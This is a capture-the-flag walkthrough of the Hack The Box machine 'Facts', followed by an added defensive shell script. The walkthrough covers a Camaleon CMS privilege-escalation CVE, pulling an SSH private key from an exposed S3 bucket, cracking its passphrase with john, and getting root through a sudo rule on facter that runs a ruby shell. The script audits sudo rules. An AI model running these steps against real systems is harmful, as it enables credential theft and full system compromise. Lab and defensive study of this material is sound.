htb machine - facts (easy)

user flag

/admin endpoint shows a Camaleon CMS instance. create an account and use the following CVE to escalate to admin:

https://github.com/d3vn0mi/cve-2025-2304-poc

on the page http://facts.htb/admin/settings/site, on the Filesystem Settings

aws s3 ls s3:// --endpoint-url http://facts.htb:54321 --recursive

aws s3 cp s3://internal/.ssh/id_ed25519 . --endpoint-url http://facts.htb:54321

ssh2john id_ed25519 > hash.txt

john hash.txt --wordlist=~/wordlists/rockyou.txt -> password dragonballz

chmod 600 id_ed25519

ssh -i id_ed25519 trivia@facts.htb

enter passphrase dragonballz

and obtain the user flag in the william home directory.

root flag

trivia@facts:/tmp$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

facter executes ruby files from a custom fact directory (--custom-dir), so under sudo they run as root.

create a simple a.rb file with the contents exec "/bin/sh"

sudo facter --custom-dir .

from there, it is gg and cat the root flag
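
defender side: the root step works only because of the sudoers rule for facter. the script below is an added example, not part of the original notes; it scans `sudo -l` output for rules that hand a code-loading binary to a user. the function names, the binary list and the sample input are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): audit `sudo -l` output for rules
# that let a user run a binary which executes caller-supplied code.
# Live use (as root): sudo -l -U <user> | audit_sudo_l

# Assumed, illustrative list. facter is the case on this page (it loads ruby
# from a custom fact directory); the rest are plain interpreters.
CODE_LOADERS="facter ruby python3 perl sh bash"

# Reads `sudo -l` output on stdin; prints one FLAG line per risky rule.
audit_sudo_l() {
    awk -v loaders="$CODE_LOADERS" '
        BEGIN { n = split(loaders, names, " "); for (i = 1; i <= n; i++) risky[names[i]] = 1 }
        /may run the following commands/ { in_rules = 1; next }
        !in_rules || !/^[ \t]+\(/ { next }      # only "(runas) [TAG:] cmd" lines
        {
            line = $0; sub(/^[ \t]+/, "", line)
            runas = line; sub(/\).*/, ")", runas)
            rest = line; sub(/^\([^)]*\)[ \t]*/, "", rest)
            np = (rest ~ /NOPASSWD:/) ? "yes" : "no"
            gsub(/[A-Z_]+:[ \t]*/, "", rest)    # drop tags: NOPASSWD:, SETENV:, ...
            m = split(rest, cmds, /,[ \t]*/)
            for (j = 1; j <= m; j++) {
                split(cmds[j], words, " ")      # words[1] is the binary path
                k = split(words[1], parts, "/")
                if (parts[k] in risky)
                    printf "FLAG nopasswd=%s runas=%s cmd=%s\n", np, runas, words[1]
            }
        }
    '
}

# Constructed sample: the rule shown on this page plus one made-up benign rule.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter
    (root) /usr/bin/systemctl status nginx
EOF
}

sample_sudo_l | audit_sudo_l   # prints: FLAG nopasswd=yes runas=(ALL) cmd=/usr/bin/facter
```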